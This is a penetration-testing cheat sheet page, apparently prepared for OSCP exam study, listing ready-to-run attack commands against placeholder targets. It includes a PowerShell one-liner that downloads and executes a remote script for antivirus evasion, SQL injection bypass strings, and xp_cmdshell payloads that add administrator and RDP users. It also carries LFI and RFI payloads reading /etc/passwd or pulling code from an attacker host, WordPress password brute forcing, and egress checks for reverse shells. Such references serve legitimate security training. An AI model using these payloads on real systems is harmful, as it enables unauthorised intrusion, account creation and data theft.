Securable - OSCP cheat sheet
Search…
Reconnaissance & enumeration
Enum, enum, enom, enomm, nom nomm!
Bash log
Log all commands and their output:
1
script target.log
Copied!
Port scanning
Nmap
1
nmap -A -sS -Pn -n x.x.x.x
Copied!
Scan all UDP port without a retry
1
nmap -sU -p- --max-retries 0 --min-rate 500 x.x.x.x
Copied!
Nc
1
nc -nvv -w 1 -z x.x.x.x 1-100
Copied!
This nc command can be very useful to check egress filtering -> see below
PowerShell (in memory -> AV evasion)
1
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts x.x.x.x"
Copied!
Host enum
1
nikto -h x.x.x.x
Copied!
1
enum4linux x.x.x.x
Copied!
Is the target 32 or 64 bit? https://github.com/SecureAuthCorp/impacket/blob/master/examples/getArch.py
1
python getArch.py -target x.x.x.x
Copied!
DNS zone transfer
1
dig axfr domain.com @nameserver
Copied!
Web fuzzing
Gobuster
1
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20
Copied!
1
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt -t 20
Copied!
1
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20 -x .txt,.php
Copied!
Wfuzz
1
wfuzz -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 400,404,500 http://x.x.x.x/FUZZ
Copied!
1
wfuzz -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt --hc 400,404,500 http://x.x.x.x/FUZZ
Copied!
Samba (SMB)
Do not underestimate this one ;)
1
smbclient -L x.x.x.x
Copied!
1
nmap --script=smb-check-vulns.nse x.x.x.x
Copied!
1
smbmount //x.x.x.x/share /mnt –o username=hodor,workgroup=hodor
Copied!
1
mount -t cifs //x.x.x.x/share /mnt
Copied!
1
mount -t cifs -o username=hodor,password=hodor //x.x.x.x/share /mnt
Copied!
1
smbclient \\\\x.x.x.x\\share
Copied!
Anonymous bind using rpcclient:
1
rpcclient -U "" x.x.x.x
Copied!
SNMP
Scan using the default community string:
1
snmpwalk -c public -v1 x.x.x.x
Copied!
Discover valid usernames by brute force querying possible usernames against a Kerberos service (source: https://nmap.org/nsedoc/scripts/krb5-enum-users.html)
1
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='domain.local',userdb=/usr/share/wordlists/SecLists/Usernames/top_shortlist.txt x.x.x.x
Copied!
CMS
CMSmap
1
cmsmap.py https://x.x.x.x
Copied!
WPscan
1
wpscan --url https://x.x.x.x
Copied!
Bruteforce login:
1
wpscan --url http://x.x.x.x --wordlist /usr/share/wordlists/SecLists/Passwords/best1050.txt --username admin --threads 10
Copied!
SQL injection
Test for authentication bypass
1
1' or '1'='1
2
1' or '1'='1'
3
1' or '1'='1'--
4
' or 1=1 --
5
a' or 1=1 --
6
" or 1=1 --
7
a" or 1=1 --
8
' or 1=1 #
9
" or 1=1 #
10
or 1=1 --
11
' or 'x'='x
12
" or "x"="x
13
') or ('x'='x
14
") or ("x"="x
Copied!
Use time delays to find injectable parameter
1
';WAITFOR DELAY '0:0:5'--
2
3
SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/
4
5
+BENCHMARK(40000000,SHA1(1337))+
6
'%2Bbenchmark(3200,SHA1(1))%2B'
Copied!
If the above works try to enable xp_cmdshell (source: http://pentestmonkey.net/blog/resurecting-xp_cmdshell)
1
EXEC sp_configure 'show advanced options', 1;
2
RECONFIGURE;
3
EXEC sp_configure 'xp_cmdshell', 1;
4
RECONFIGURE;
Copied!
xp_cmdshell - test ping
1
';exec master..xp_cmdshell 'ping -n 3 x.x.x.x'; --
Copied!
xp_cmdshell - add admin user
1
';exec master..xp_cmdshell 'net user hodor Qwerty123! /ADD && net localgroup administrators hodor /ADD'; --
Copied!
xp_cmdshell - add admin user and to RDP group
1
';exec master..xp_cmdshell 'net user hodor Qwerty123! /ADD && net localgroup administrators hodor /ADD && net localgroup "Remote Desktop Users" hodor /ADD'; --
Copied!
Local File Inclusion (LFI)
Basic checks
Linux
1
../../../../../../../../../../etc/passwd
2
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
3
../../../../../../../../../../etc/passwd%00
4
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%2500
Copied!
Windows
1
../../../../../../../../../../boot.ini
2
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
3
../../../../../../../../../../boot.ini%00
4
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%2500
5
6
../../../../../../../../../../windows/system32/drivers/etc/hosts
7
../../../../../../../../../../windows/system32/drivers/etc/hosts%00
8
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/system32/drivers/etc/hosts
9
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/system32/drivers/etc/hosts%2500
Copied!
LFI Wrappers
expect://
1
http://x.x.x.x/blah?parameter=expect://whoami
Copied!
data://
1
http://x.x.x.x/blah?parameter=data://text/plain;base64,PD8gcGhwaW5mbygpOyA/Pg==
2
# the base64 encoded payload is: <? phpinfo(); ?>
Copied!
input://
1
http://x.x.x.x/blah?parameter=php://input
2
# POST data (using Hackbar)
3
<? phpinfo(); ?>
Copied!
LFI to RCE
Remote File Inclusion (RFI)
Example request (where "x.x.x.x" is your attacker's IP):
1
GET /supersecret/admin.php?path=http://x.x.x.x/phpinfo.php%00
Copied!
Check for egress filtering
In other words: find an outgoing port for a reverse shell. First start TCPdump at your own box
1
tcpdump -i eth0
Copied!
Run at target (where x.x.x.x is your attacking box)
1
nc -nvv -w 1 -z x.x.x.x 1-100
Copied!
Files and file systems
Unmounted file systems
1
cat /etc/fstab
Copied!
World writeable directories
1
find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root
Copied!
World writeable files
1
find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null
Copied!
Writeable config files
1
find /etc/ -writable -type f 2>/dev/null
Copied!
Last modified 2yr ago
Copy link
Contents
Bash log
Port scanning
Nmap
Nc
PowerShell (in memory -> AV evasion)
Host enum
DNS zone transfer
Web fuzzing
Samba (SMB)
SNMP
CMS
CMSmap
WPscan
SQL injection
Test for authentication bypass
Use time delays to find injectable parameter
Local File Inclusion (LFI)
Basic checks
LFI Wrappers
LFI to RCE
Remote File Inclusion (RFI)
Check for egress filtering
Files and file systems